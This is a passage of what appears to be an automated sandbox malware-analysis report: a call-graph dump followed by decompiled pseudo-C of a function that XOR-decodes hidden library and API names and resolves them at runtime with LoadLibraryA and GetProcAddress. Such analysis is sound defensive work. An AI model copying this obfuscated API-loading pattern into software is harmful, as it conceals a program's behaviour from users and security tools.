46048->46038 46049->46046 46051 82a8b0 46050->46051 46052 82a52e 46050->46052 46051->45665 46058 82a56b 46052->46058 46082 86db91 EnterCriticalSection LeaveCriticalSection 46052->46082 46053 82a5b2 LoadLibraryA 46053->46051 46055 82a5cd 46053->46055 46067 82a5f7 46055->46067 46083 86db91 EnterCriticalSection LeaveCriticalSection 46055->46083 46056 82a639 GetProcAddress 46059 82a66f 46056->46059 46066 82a679 46056->46066 46058->46053 46084 86db91 EnterCriticalSection LeaveCriticalSection 46059->46084 46060 82a6bf GetProcAddress 46062 82a6f2 46060->46062 46069 82a6fc 46060->46069 46085 86db91 EnterCriticalSection LeaveCriticalSection 46062->46085 46064 82a749 GetProcAddress 46086 82a8b7 EnterCriticalSection LeaveCriticalSection 46064->46086 46066->46060 46067->46056 46068 82a760 46070 82a767 GetProcAddress 46068->46070 46069->46064 46071 82a78d 46070->46071 46077 82a797 46070->46077 46087 86db91 EnterCriticalSection LeaveCriticalSection 46071->46087 46073 82a7d0 GetProcAddress 46074 82a804 46073->46074 46080 82a80e 46073->46080 46088 86db91 EnterCriticalSection LeaveCriticalSection 46074->46088 46076 82a856 GetProcAddress 46078 82a871 46076->46078 46079 82a8a4 FreeLibrary 46076->46079 46077->46073 46078->46079 46081 82a899 46078->46081 46079->46051 46080->46076 46081->46051 46082->46058 46083->46067 46084->46066 46085->46069 46086->46068 46087->46077 46088->46080 46089->45687 46090->45734 46091->45735 46092->45738 46093->45761 46094->45783 46095->45789 46096->45791 46097->45838 46098->45839 46099->45843 46100->45865 46101->45887 46102->45893 46103->45936 46104->45937 46105->45941 46106->45963 46107 812e75 46108 812e7a 46107->46108 46109 82e75f 32 API calls 46108->46109 46110 812e95 46109->46110 46111 812e9a 46110->46111 46112 81290a 24 API calls 46110->46112 46113 812eba 46112->46113 46114 812b95 2 API calls 46113->46114 46115 812eca 46114->46115 46116 812ece 46115->46116 46117 812839 23 API calls 46115->46117 46118 8116cb 46117->46118 46119 8183d5 46122 818347 46119->46122 46121 8183dc 46123 818351 46122->46123 46124 86dc67 moneypunct 19 API calls 46123->46124 46125 81835f 46124->46125 46130 81774b 46125->46130 46128 8183a3 codecvt 46128->46121 46129 86dc67 moneypunct 19 API calls 46129->46128 46131 81778b 46130->46131 46132 817757 46130->46132 46131->46128 46131->46129 46132->46131 46133 817771 CreateFileMappingA 46132->46133 46133->46131 46134 817792 MapViewOfFile 46133->46134 46134->46131 46135 8177a8 CloseHandle 46134->46135 46135->46131 46136 83e256 46137 83e268 46136->46137 46138 83e2b2 46136->46138 46137->46138 46140 838ec9 46137->46140 46141 838ed6 46140->46141 46144 838edb 46140->46144 46164 836906 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 46141->46164 46143 838ee8 46143->46138 46144->46143 46145 838f46 46144->46145 46146 838f1d 46144->46146 46145->46143 46160 838ad8 46145->46160 46151 838a5c 46146->46151 46165 8372f4 46151->46165 46153 838a74 46154 838a91 46153->46154 46169 837325 46153->46169 46154->46143 46156 838bc5 46154->46156 46157 838bcc 46156->46157 46158 838c02 46157->46158 46159 838a5c 13 API calls 46157->46159 46158->46143 46159->46157 46161 838af4 46160->46161 46162 837325 13 API calls 46161->46162 46163 838afb 46162->46163 46163->46145 46164->46144 46166 837302 46165->46166 46168 8372fd 46165->46168 46173 8372a1 46166->46173 46168->46153 46170 837332 46169->46170 46171 83732a 46169->46171 46170->46154 46204 83588e 13 API calls 46171->46204 46176 8356dd 46173->46176 46175 8372ba 46175->46168 46177 8356f7 46176->46177 46181 8357e7 __cftof 46176->46181 46178 835853 46177->46178 46179 83572c 46177->46179 46177->46181 46178->46181 46199 8356bc SetFilePointer GetLastError ReadFile 46178->46199 46187 8355e0 46179->46187 46181->46175 46183 8357ab 46183->46181 46198 83588e 13 API calls 46183->46198 46185 835735 __cftof 46185->46181 46185->46183 46194 835572 46185->46194 46188 8355f8 46187->46188 46190 835639 46187->46190 46188->46190 46192 835611 46188->46192 46189 830614 6 API calls 46191 83561b __cftof 46189->46191 46190->46189 46190->46191 46191->46185 46200 8354de EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 46192->46200 46195 83558e 46194->46195 46197 835587 _Yarn 46194->46197 46201 83032d 46195->46201 46197->46183 46198->46181 46199->46181 46200->46191 46203 833154 3 API calls 46201->46203 46202 830340 46202->46197 46203->46202 46204->46170 46205 8887fd GetEnvironmentStringsW 46206 888814 46205->46206 46216 88886a 46205->46216 46217 88749b 46206->46217 46207 88887a 46208 888873 FreeEnvironmentStringsW 46208->46207 46210 88882d 46211 88255c std::_Locinfo::_W_Getdays 3 API calls 46210->46211 46210->46216 46212 88883d 46211->46212 46213 88749b __cftof WideCharToMultiByte 46212->46213 46215 888855 46212->46215 46213->46215 46214 880123 _free 2 API calls 46214->46216 46215->46214 46216->46207 46216->46208 46219 8874b4 WideCharToMultiByte 46217->46219 46219->46210 46220 880c90 46225 880a66 46220->46225 46223 880ccf 46226 880a85 46225->46226 46227 880a98 46226->46227 46230 880aad 46226->46230 46235 873529 18 API calls _Deallocate 46227->46235 46229 880aa8 46229->46223 46232 88c45c 46229->46232 46230->46229 46236 873529 18 API calls _Deallocate 46230->46236 46237 88be21 46232->46237 46234 88c477 46234->46223 46235->46229 46236->46229 46239 88be2d CallCatchBlock 46237->46239 46238 88be34 46250 873529 18 API calls _Deallocate 46238->46250 46239->46238 46240 88be5f 46239->46240 46244 88c3ee 46240->46244 46243 88be43 46243->46234 46245 88c410 46244->46245 46246 88c424 46245->46246 46251 88c47c 46245->46251 46248 88c456 46246->46248 46249 880123 _free 2 API calls 46246->46249 46248->46243 46249->46248 46250->46243 46276 88c1ca 46251->46276 46257 88c4ae 46257->46246 46258 88c5a2 GetFileType 46260 88c5ad GetLastError __dosmaperr CloseHandle 46258->46260 46264 88c5f4 46258->46264 46259 88c577 GetLastError __dosmaperr 46259->46257 46260->46257 46274 88c5e4 46260->46274 46261 88c525 46261->46258 46261->46259 46299 88c135 CreateFileW 46261->46299 46263 88c56a 46263->46258 46263->46259 46265 88c661 46264->46265 46300 88c344 45 API calls 2 library calls 46264->46300 46267 88c668 46265->46267 46268 88c6a4 46265->46268 46269 8810e3 __wsopen_s 22 API calls 46267->46269 46268->46257 46270 88c720 CloseHandle 46268->46270 46269->46257 46301 88c135 CreateFileW 46270->46301 46272 88c74b 46273 88c755 GetLastError __dosmaperr 46272->46273 46272->46274 46302 889121 SetStdHandle 46273->46302 46274->46257 46277 88c205 46276->46277 46279 88c1eb 46276->46279 46303 88c15a 46277->46303 46279->46277 46308 873529 18 API calls _Deallocate 46279->46308 46281 88c23d 46283 88c26c 46281->46283 46309 873529 18 API calls _Deallocate 46281->46309 46282 88c2bf 46282->46257 46287 88900e 46282->46287 46283->46282 46285 873556 std::_Locinfo::_W_Getdays 11 API calls 46283->46285 46286 88c343 46285->46286 46288 88901a CallCatchBlock 46287->46288 46311 87703f EnterCriticalSection 46288->46311 46291 889021 46292 889046 46291->46292 46295 88904b 46291->46295 46296 8890b5 EnterCriticalSection 46291->46296 46294 888de8 __wsopen_s 5 API calls 46292->46294 46294->46295 46312 889118 46295->46312 46296->46295 46297 8890c2 LeaveCriticalSection 46296->46297 46297->46291 46298 88c135 CreateFileW 46298->46261 46299->46263 46300->46265 46301->46272 46302->46274 46304 88c172 46303->46304 46305 88c18d 46304->46305 46310 873529 18 API calls _Deallocate 46304->46310 46305->46281 46307 88c1bc 46307->46281 46308->46277 46309->46283 46310->46307 46311->46291 46315 877087 LeaveCriticalSection 46312->46315 46314 889088 46314->46257 46314->46298 46315->46314 46316 87287e 46319 87271c 46316->46319 46320 87273c 46319->46320 46321 87272a 46319->46321 46331 8725c3 46320->46331 46347 86e56b GetModuleHandleW 46321->46347 46324 87272f 46324->46320 46348 8727c2 GetModuleHandleExW 46324->46348 46326 872775 46332 8725cf CallCatchBlock 46331->46332 46354 87703f EnterCriticalSection 46332->46354 46334 8725d9 46355 87262f 46334->46355 46336 8725e6 46359 872604 46336->46359 46339 872780 46364 880095 GetPEB 46339->46364 46341 87278a 46342 8727af 46341->46342 46343 87278f GetPEB 46341->46343 46345 8727c2 __InternalCxxFrameHandler 3 API calls 46342->46345 46343->46342 46344 87279f GetCurrentProcess TerminateProcess 46343->46344 46344->46342 46346 8727b7 ExitProcess 46345->46346 46347->46324 46349 872804 46348->46349 46350 8727e1 GetProcAddress 46348->46350 46351 87273b 46349->46351 46352 87280a FreeLibrary 46349->46352 46353 8727f6 46350->46353 46351->46320 46352->46351 46353->46349 46354->46334 46356 87263b CallCatchBlock 46355->46356 46357 87269c 46356->46357 46362 87dad4 EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError __InternalCxxFrameHandler 46356->46362 46357->46336 46363 877087 LeaveCriticalSection 46359->46363 46361 8725f2 46361->46326 46361->46339 46362->46357 46363->46361 46365 8800af 46364->46365 46365->46341 46366 823e7b 46367 823e85 46366->46367 46928 87534a 46367->46928 46371 823eb4 46372 823ebe GetModuleHandleA GetModuleFileNameA 46371->46372 46373 823f1d 46372->46373 46376 823f28 46372->46376 46977 86db91 EnterCriticalSection LeaveCriticalSection 46373->46977 46378 823fae 46376->46378 46978 86db91 EnterCriticalSection LeaveCriticalSection 46376->46978 46379 824031 46378->46379 46979 86db91 EnterCriticalSection LeaveCriticalSection 46378->46979 46381 8240aa 46379->46381 46980 86db91 EnterCriticalSection LeaveCriticalSection 46379->46980 46382 82e917 19 API calls 46381->46382 46383 824133 46382->46383 46384 82e917 19 API calls 46383->46384 46385 824148 46384->46385 46386 82e917 19 API calls 46385->46386 46387 82415d 46386->46387 46388 82df41 collate 18 API calls 46387->46388 46389 8241b5 46388->46389 46390 82df41 collate 18 API calls 46389->46390 46391 8241c0 46390->46391 46392 82df41 collate 18 API calls 46391->46392 46393 8241cb 46392->46393 46394 82df41 collate 18 API calls 46393->46394 46395 8241da 46394->46395 46396 82e8c7 19 API calls 46395->46396 46397 824217 46396->46397 46398 82fa3b 19 API calls 46397->46398 46399 824229 46398->46399 46400 82e917 19 API calls 46399->46400 46401 824240 46400->46401 46402 82fa3b 19 API calls 46401->46402 46403 824255 46402->46403 46404 82df41 collate 18 API calls 46403->46404 46405 824260 46404->46405 46406 82df41 collate 18 API calls 46405->46406 46407 824268 46406->46407 46408 82df41 collate 18 API calls 46407->46408 46409 824273 46408->46409 46410 82df41 collate 18 API calls 46409->46410 46411 82427e 46410->46411 46412 82df41 collate 18 API calls 46411->46412 46413 82428d 46412->46413 46934 826506 46413->46934 46415 824292 46938 82648a 46415->46938 46417 8242cc 46942 872ac3 46417->46942 47013 8752c7 46928->47013 46930 823e9c 46931 875619 46930->46931 47018 883676 46931->47018 46933 875624 46933->46371 46935 826559 46934->46935 46937 826565 46934->46937 47038 86db91 EnterCriticalSection LeaveCriticalSection 46935->47038 46937->46415 46939 8264c4 46938->46939 46941 8264d0 46938->46941 47039 86db91 EnterCriticalSection LeaveCriticalSection 46939->47039 46941->46417 46943 8805f2 __InternalCxxFrameHandler 7 API calls 46942->46943 46945 872acf 46943->46945 46944 872af1 46945->46944 46948 8800c6 _unexpected 3 API calls 46945->46948 46977->46376 46978->46378 46979->46379 46980->46381 47014 8752d6 47013->47014 47016 8752e6 __alldvrm 47013->47016 47017 873529 18 API calls _Deallocate 47014->47017 47016->46930 47017->47016 47025 8805f2 GetLastError 47018->47025 47020 88367e 47021 88369c 47020->47021 47022 88255c std::_Locinfo::_W_Getdays 3 API calls 47020->47022 47021->46933 47023 883692 47022->47023 47024 880123 _free 2 API calls 47023->47024 47024->47021 47026 880609 47025->47026 47027 880615 SetLastError 47026->47027 47028 8800c6 _unexpected 3 API calls 47026->47028 47027->47020 47030 88063d 47028->47030 47031 880645 47030->47031 47032 88067d 47030->47032 47033 880123 _free 2 API calls 47031->47033 47037 8802c9 EnterCriticalSection LeaveCriticalSection _unexpected 47032->47037 47033->47027 47035 880688 47036 880123 _free 2 API calls 47035->47036 47036->47027 47037->47035 47038->46937 47039->46941 47055 81347a 47057 813484 47055->47057 47058 8134e1 47057->47058 47129 856187 GetCurrentDirectoryW 47057->47129 47059 8134e9 47058->47059 47060 812839 23 API calls 47058->47060 47061 813506 47060->47061 47070 813549 47061->47070 47133 86db91 EnterCriticalSection LeaveCriticalSection 47061->47133 47063 81358c LoadLibraryA 47064 8135a3 47063->47064 47065 8135c2 47063->47065 47134 8139f5 EnterCriticalSection LeaveCriticalSection 47064->47134 47078 8135f4 47065->47078 47135 86db91 EnterCriticalSection LeaveCriticalSection 47065->47135 47067 81363f LoadLibraryA 47071 813650 47067->47071 47072 8136b8 47067->47072 47068 8135a8 GetProcAddress 47068->47065 47070->47063 47136 813a64 EnterCriticalSection LeaveCriticalSection 47071->47136 47083 8136eb 47072->47083 47139 86db91 EnterCriticalSection LeaveCriticalSection 47072->47139 47075 813732 LoadLibraryA 47079 8137f0 47075->47079 47086 81374a 47075->47086 47076 813655 47080 81365c GetProcAddress 47076->47080 47078->47067 47091 81381b 47079->47091 47140 86db91 EnterCriticalSection LeaveCriticalSection 47079->47140 47137 813acf EnterCriticalSection LeaveCriticalSection 47080->47137 47081 813862 LoadLibraryA 47087 813930 47081->47087 47095 81387a 47081->47095 47083->47075 47085 813760 GetProcAddress 47089 813779 47085->47089 47086->47085 47105 813960 47087->47105 47143 86db91 EnterCriticalSection LeaveCriticalSection 47087->47143 47088 81366a GetProcAddress 47102 813689 47088->47102 47099 813780 GetProcAddress 47089->47099 47091->47081 47093 8139a2 LoadLibraryA 47096 8139f0 47093->47096 47097 8139b6 47093->47097 47094 813890 GetProcAddress 47100 8138a9 47094->47100 47095->47094 47144 81412b EnterCriticalSection LeaveCriticalSection 47097->47144 47106 813793 47099->47106 47108 8138b0 GetProcAddress 47100->47108 47101 81369a GetProcAddress 47138 813bc6 EnterCriticalSection LeaveCriticalSection 47101->47138 47102->47101 47102->47102 47103 8139bb 47109 8139c2 GetProcAddress 47103->47109 47105->47093 47110 81379a GetProcAddress 47106->47110 47107 8136a8 47113 8136af GetProcAddress 47107->47113 47111 8138c3 47108->47111 47145 81419f EnterCriticalSection LeaveCriticalSection 47109->47145 47118 8137ad 47110->47118 47116 8138ca GetProcAddress 47111->47116 47113->47072 47114 8139db 47117 8139e2 GetProcAddress 47114->47117 47115 8137be GetProcAddress 47121 8137d1 47115->47121 47122 8138dd 47116->47122 47117->47096 47118->47115 47118->47118 47119 8137e2 GetProcAddress 47119->47079 47120 8138ee GetProcAddress 47141 81404b EnterCriticalSection LeaveCriticalSection 47120->47141 47121->47119 47121->47121 47122->47120 47122->47122 47124 813901 47125 813908 GetProcAddress 47124->47125 47142 8140bf EnterCriticalSection LeaveCriticalSection 47125->47142 47127 81391b 47128 813922 GetProcAddress 47127->47128 47128->47087 47130 8561a6 GetLastError 47129->47130 47131 85619d 47129->47131 47132 8561a2 47130->47132 47131->47130 47131->47132 47132->47057 47133->47070 47134->47068 47135->47078 47136->47076 47137->47088 47138->47107 47139->47083 47140->47091 47141->47124 47142->47127 47143->47105 47144->47103 47145->47114

                                    Executed Functions

                                    Function 0081347A Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 413libraryloaderCOMMONCrypto
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 81347a-8134b2 call 890cfc call 82de34 4 8134b7-8134c3 0->4 5 8134c5 4->5 6 8134c7-8134df call 856187 call 82d7b1 4->6 5->6 6->4 11 8134e1-8134e7 6->11 12 8134e9-8134f9 11->12 13 8134fa-81353d call 812839 11->13 16 813575-81357b 13->16 17 81353f-813551 call 86db91 13->17 19 81357d 16->19 20 81358c-8135a1 LoadLibraryA 16->20 17->16 28 813553-813574 call 86dfe8 call 86db47 17->28 24 81357f-81358a 19->24 21 8135a3-8135ab call 8139f5 20->21 22 8135c2-8135e8 20->22 37 8135b9-8135bd GetProcAddress 21->37 38 8135ad 21->38 26 813628-81362e 22->26 27 8135ea-8135fc call 86db91 22->27 24->20 24->24 29 813630 26->29 30 81363f-81364e LoadLibraryA 26->30 27->26 45 8135fe-813627 call 86dfe8 call 86db47 27->45 28->16 34 813632-81363d 29->34 35 813650-81366d call 813a64 call 82d668 GetProcAddress call 813acf 30->35 36 8136b8-8136df 30->36 34->30 34->34 85 81367b-81368c GetProcAddress call 813b4c 35->85 86 81366f 35->86 43 8136e1-8136f3 call 86db91 36->43 44 81371b-813721 36->44 37->22 42 8135af-8135b7 38->42 42->37 42->42 43->44 61 8136f5-81371a call 86dfe8 call 86db47 43->61 47 813723 44->47 48 813732-813744 LoadLibraryA 44->48 45->26 53 813725-813730 47->53 54 8137f0-81380f 48->54 55 81374a-813752 call 813c3d 48->55 53->48 53->53 62 813811-813823 call 86db91 54->62 63 81384b-813851 54->63 72 813760-8137b0 GetProcAddress call 813cb4 call 82d5da GetProcAddress call 813d2b call 82d6f2 GetProcAddress call 813d9a 55->72 73 813754 55->73 61->44 62->63 88 813825-81384a call 86dfe8 call 86db47 62->88 66 813853 63->66 67 813862-813874 LoadLibraryA 63->67 74 813855-813860 66->74 75 813930-813954 67->75 76 81387a-813882 call 813e87 67->76 142 8137b2 72->142 143 8137be-8137d4 GetProcAddress call 813e0a 72->143 82 813756-81375e 73->82 74->67 74->74 80 813956-813968 call 86db91 75->80 81 81398d-813993 75->81 101 813890-8138e0 GetProcAddress call 813efd call 82d4fa GetProcAddress call 813f68 call 82d5c5 GetProcAddress call 813fdc 76->101 102 813884 76->102 80->81 108 81396a-81398c call 86dfe8 call 86db47 80->108 94 8139a2-8139b4 LoadLibraryA 81->94 95 813995-8139a0 81->95 82->72 82->82 112 81369a-8136b3 GetProcAddress call 813bc6 call 82d5da GetProcAddress 85->112 113 81368e 85->113 93 813671-813679 86->93 88->63 93->85 93->93 104 8139f0-8139f4 94->104 105 8139b6-8139eb call 81412b call 82d5c5 GetProcAddress call 81419f call 82d5da GetProcAddress 94->105 95->94 95->95 153 8138e2 101->153 154 8138ee-81392b GetProcAddress call 81404b call 82d5c5 GetProcAddress call 8140bf call 82d4e5 GetProcAddress 101->154 110 813886-81388e 102->110 105->104 108->81 110->101 110->110 112->36 114 813690-813698 113->114 114->112 114->114 146 8137b4-8137bc 142->146 151 8137e2-8137eb GetProcAddress 143->151 152 8137d6 143->152 146->143 146->146 151->54 155 8137d8-8137e0 152->155 156 8138e4-8138ec 153->156 154->75 155->151 155->155 156->154 156->156
                                    C-Code - Quality: 80%
                                    			E0081347A(void* __ebx, intOrPtr* __ecx, void* __edx) {
				char _v4;
				intOrPtr _v8;
				char _v12;
				char _v14;
				short _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr* _t85;
				intOrPtr _t90;
				struct HINSTANCE__* _t91;
				intOrPtr _t92;
				struct HINSTANCE__* _t93;
				intOrPtr _t94;
				_Unknown_base(*)()* _t95;
				intOrPtr _t96;
				_Unknown_base(*)()* _t97;
				intOrPtr _t98;
				_Unknown_base(*)()* _t99;
				CHAR* _t108;
				CHAR* _t116;
				void* _t124;
				CHAR* _t128;
				CHAR* _t136;
				CHAR* _t138;
				void* _t140;
				CHAR* _t147;
				CHAR* _t149;
				void* _t154;
				CHAR* _t158;
				void* _t160;
				void* _t166;
				void* _t167;
				intOrPtr _t176;
				intOrPtr _t177;
				void* _t180;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t204;
				void* _t207;
				intOrPtr* _t210;
				struct HINSTANCE__* _t211;
				struct HINSTANCE__* _t212;
				intOrPtr _t213;
				void* _t222;
				void* _t239;
				void* _t240;
				intOrPtr* _t241;

				_t207 = __edx;
				L00890CFC(0x891b05, __ebx, __ecx, __edx);
				_t240 = _t239 - 0xc;
				_push(__ebx);
				_t210 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 7;
				 *((short*)(__ecx)) = 0;
				_v16 = 1;
				_v4 = 1;
				L0082DE34(__ecx, 0x104, 0);
				do {
					_t85 = _t210;
					_t173 =  *((intOrPtr*)(_t210 + 0x10));
					_v20 =  *((intOrPtr*)(_t210 + 0x10));
					if( *((intOrPtr*)(_t210 + 0x14)) >= 8) {
						_t85 =  *_t210;
					}
					_t222 = E00856187(_t173, _t85);
					_t166 = _t207;
					E0082D7B1(_t210, _t222, 0);
				} while (_t222 >= _v20);
				_v4 = 0;
				if(_t166 != 0) {
					E00812839(_t166, "current_path()", _t166, __eflags);
					asm("int3");
					_t241 = _t240 - 0x14;
					_push(_t166);
					_push(_t222);
					_t167 = 0;
					_v48 = 0x5e575c6d;
					_t176 =  *((intOrPtr*)( *[fs:0x2c]));
					_t90 =  *0x8b5a74; // 0x80000003
					_push(_t210);
					_v44 = 0x1c1d5a;
					_v40 = 0x2e42424a;
					_v32 = _t176;
					__eflags = _t90 -  *((intOrPtr*)(_t176 + 4));
					if(_t90 >  *((intOrPtr*)(_t176 + 4))) {
						E0086DB91(_t90, 0x8b5a74);
						__eflags =  *0x8b5a74 - 0xffffffff;
						_pop(_t204);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L0086DFE8(_t204, __eflags, 0x8955dd);
							 *_t241 = 0x8b5a74;
							L0086DB47();
						}
					}
					__eflags =  *0x8b52cf - _t167; // 0x0
					if(__eflags != 0) {
						_t160 = _t167;
						do {
							 *(_t160 + 0x8b52c4) =  *(_t160 + 0x8b52c4) ^ 0x0000002e;
							_t160 = _t160 + 1;
							__eflags = _t160 - 0xc;
						} while (_t160 < 0xc);
					}
					_t91 = LoadLibraryA(0x8b52c4); // executed
					_t211 = _t91;
					__eflags = _t211;
					if(_t211 != 0) {
						_t158 = E008139F5();
						__eflags = _t158[0x12] - _t167;
						if(_t158[0x12] != _t167) {
							_t203 = _t167;
							do {
								 *(_t203 + _t158) =  *(_t203 + _t158) ^ 0x0000002e;
								_t203 = _t203 + 1;
								__eflags = _t203 - 0x13;
							} while (_t203 < 0x13);
						}
						 *0x8b4844 = GetProcAddress(_t211, _t158);
					}
					_t177 = _v8;
					_t92 =  *0x8b4e3c; // 0x80000005
					_v24 = 0x575c4d4c;
					_v20 = 0x4a005a5e;
					_v16 = 0x4242;
					_v14 = 0x2e;
					__eflags = _t92 -  *((intOrPtr*)(_t177 + 4));
					if(_t92 >  *((intOrPtr*)(_t177 + 4))) {
						E0086DB91(_t92, 0x8b4e3c);
						__eflags =  *0x8b4e3c - 0xffffffff;
						_pop(_t201);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							L0086DFE8(_t201, __eflags, 0x8955bd);
							 *_t241 = 0x8b4e3c;
							L0086DB47();
						}
					}
					__eflags =  *0x8b5272 - _t167; // 0x0
					if(__eflags != 0) {
						_t154 = _t167;
						do {
							 *(_t154 + 0x8b5268) =  *(_t154 + 0x8b5268) ^ 0x0000002e;
							_t154 = _t154 + 1;
							__eflags = _t154 - 0xb;
						} while (_t154 < 0xb);
					}
					_t93 = LoadLibraryA(0x8b5268); // executed
					_t212 = _t93;
					__eflags = _t212;
					if(_t212 != 0) {
						 *0x8b4828 = GetProcAddress(_t212, E0082D668(E00813A64()));
						_t147 = E00813ACF();
						__eflags = _t147[0x1a] - _t167;
						if(_t147[0x1a] != _t167) {
							_t200 = _t167;
							do {
								 *(_t200 + _t147) =  *(_t200 + _t147) ^ 0x0000002e;
								_t200 = _t200 + 1;
								__eflags = _t200 - 0x1b;
							} while (_t200 < 0x1b);
						}
						 *0x8b487c = GetProcAddress(_t212, _t147);
						_t149 = L00813B4C();
						__eflags = _t149[0x1b] - _t167;
						if(_t149[0x1b] != _t167) {
							_t199 = _t167;
							do {
								 *(_t199 + _t149) =  *(_t199 + _t149) ^ 0x0000002e;
								_t199 = _t199 + 1;
								__eflags = _t199 - 0x1c;
							} while (_t199 < 0x1c);
						}
						 *0x8b48a0 = GetProcAddress(_t212, _t149);
						 *0x8b4868 = GetProcAddress(_t212, E0082D5DA(E00813BC6()));
					}
					_t213 = _v8;
					_t94 =  *0x8b5c5c; // 0x8000000a
					_v24 = 0x405c4b45;
					_v20 = 0x1c1d424b;
					_v16 = 0x42424a00;
					_v12 = 0x2e;
					__eflags = _t94 -  *((intOrPtr*)(_t213 + 4));
					if(_t94 >  *((intOrPtr*)(_t213 + 4))) {
						E0086DB91(_t94, 0x8b5c5c);
						__eflags =  *0x8b5c5c - 0xffffffff;
						_pop(_t195);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsb");
							L0086DFE8(_t195, __eflags, 0x89556f);
							 *_t241 = 0x8b5c5c;
							L0086DB47();
							_t213 = _v8;
						}
					}
					__eflags =  *0x8b5098 - _t167; // 0x0
					if(__eflags != 0) {
						_t140 = _t167;
						do {
							 *(_t140 + 0x8b508c) =  *(_t140 + 0x8b508c) ^ 0x0000002e;
							_t140 = _t140 + 1;
							__eflags = _t140 - 0xd;
						} while (_t140 < 0xd);
					}
					_t95 = LoadLibraryA(0x8b508c);
					 *0x8b47fc = _t95;
					__eflags = _t95;
					if(_t95 != 0) {
						_t128 = L00813C3D();
						__eflags = _t128[0x18] - _t167;
						if(_t128[0x18] != _t167) {
							_t194 = _t167;
							do {
								 *(_t194 + _t128) =  *(_t194 + _t128) ^ 0x0000002e;
								_t194 = _t194 + 1;
								__eflags = _t194 - 0x19;
							} while (_t194 < 0x19);
						}
						 *0x8b488c = GetProcAddress( *0x8b47fc, _t128);
						 *0x8b483c = GetProcAddress( *0x8b47fc, E0082D5DA(L00813CB4()));
						 *0x8b47f8 = GetProcAddress( *0x8b47fc, E0082D6F2(L00813D2B()));
						_t136 = L00813D9A();
						__eflags = _t136[0x14] - _t167;
						if(_t136[0x14] != _t167) {
							_t193 = _t167;
							do {
								 *(_t193 + _t136) =  *(_t193 + _t136) ^ 0x0000002e;
								_t193 = _t193 + 1;
								__eflags = _t193 - 0x15;
							} while (_t193 < 0x15);
						}
						 *0x8b4854 = GetProcAddress( *0x8b47fc, _t136);
						_t138 = L00813E0A();
						__eflags = _t138[0x1a] - _t167;
						if(_t138[0x1a] != _t167) {
							_t192 = _t167;
							do {
								 *(_t192 + _t138) =  *(_t192 + _t138) ^ 0x0000002e;
								_t192 = _t192 + 1;
								__eflags = _t192 - 0x1b;
							} while (_t192 < 0x1b);
						}
						 *0x8b48a8 = GetProcAddress( *0x8b47fc, _t138);
					}
					_t96 =  *0x8b5ac4; // 0x80000010
					_v24 = 0x1d676a69;
					_v20 = 0x424a001c;
					_v16 = 0x2e42;
					__eflags = _t96 -  *((intOrPtr*)(_t213 + 4));
					if(_t96 >  *((intOrPtr*)(_t213 + 4))) {
						E0086DB91(_t96, 0x8b5ac4);
						__eflags =  *0x8b5ac4 - 0xffffffff;
						_pop(_t188);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsw");
							L0086DFE8(_t188, __eflags, 0x895513);
							 *_t241 = 0x8b5ac4;
							L0086DB47();
							_t213 = _v8;
						}
					}
					__eflags =  *0x8b4d49 - _t167; // 0x0
					if(__eflags != 0) {
						_t124 = _t167;
						do {
							 *(_t124 + 0x8b4d40) =  *(_t124 + 0x8b4d40) ^ 0x0000002e;
							_t124 = _t124 + 1;
							__eflags = _t124 - 0xa;
						} while (_t124 < 0xa);
					}
					_t97 = LoadLibraryA(0x8b4d40);
					 *0x8b4860 = _t97;
					__eflags = _t97;
					if(_t97 != 0) {
						_t108 = L00813E87();
						__eflags = _t108[0x16] - _t167;
						if(_t108[0x16] != _t167) {
							_t187 = _t167;
							do {
								 *(_t187 + _t108) =  *(_t187 + _t108) ^ 0x0000002e;
								_t187 = _t187 + 1;
								__eflags = _t187 - 0x17;
							} while (_t187 < 0x17);
						}
						 *0x8b4878 = GetProcAddress( *0x8b4860, _t108);
						 *0x8b4840 = GetProcAddress( *0x8b4860, E0082D4FA(L00813EFD()));
						 *0x8b4898 = GetProcAddress( *0x8b4860, E0082D5C5(L00813F68()));
						_t116 = L00813FDC();
						__eflags = _t116[0x12] - _t167;
						if(_t116[0x12] != _t167) {
							_t186 = _t167;
							do {
								 *(_t186 + _t116) =  *(_t186 + _t116) ^ 0x0000002e;
								_t186 = _t186 + 1;
								__eflags = _t186 - 0x13;
							} while (_t186 < 0x13);
						}
						 *0x8b48b0 = GetProcAddress( *0x8b4860, _t116);
						 *0x8b4800 = GetProcAddress( *0x8b4860, E0082D5C5(E0081404B()));
						 *0x8b4880 = GetProcAddress( *0x8b4860, E0082D4E5(E008140BF()));
					}
					_t98 =  *0x8b5eb4; // 0x80000017
					_v24 = 0x6f786a6f;
					_v20 = 0x1c1d677e;
					_v16 = 0x42424a00;
					_v12 = 0x2e;
					__eflags = _t98 -  *((intOrPtr*)(_t213 + 4));
					if(_t98 >  *((intOrPtr*)(_t213 + 4))) {
						E0086DB91(_t98, 0x8b5eb4);
						__eflags =  *0x8b5eb4 - 0xffffffff;
						_pop(_t180);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsb");
							L0086DFE8(_t180, __eflags, 0x8954ab);
							 *_t241 = 0x8b5eb4;
							L0086DB47();
						}
					}
					__eflags =  *0x8b5448 - _t167; // 0x0
					if(__eflags != 0) {
						do {
							 *(_t167 + 0x8b543c) =  *(_t167 + 0x8b543c) ^ 0x0000002e;
							_t167 = _t167 + 1;
							__eflags = _t167 - 0xd;
						} while (_t167 < 0xd);
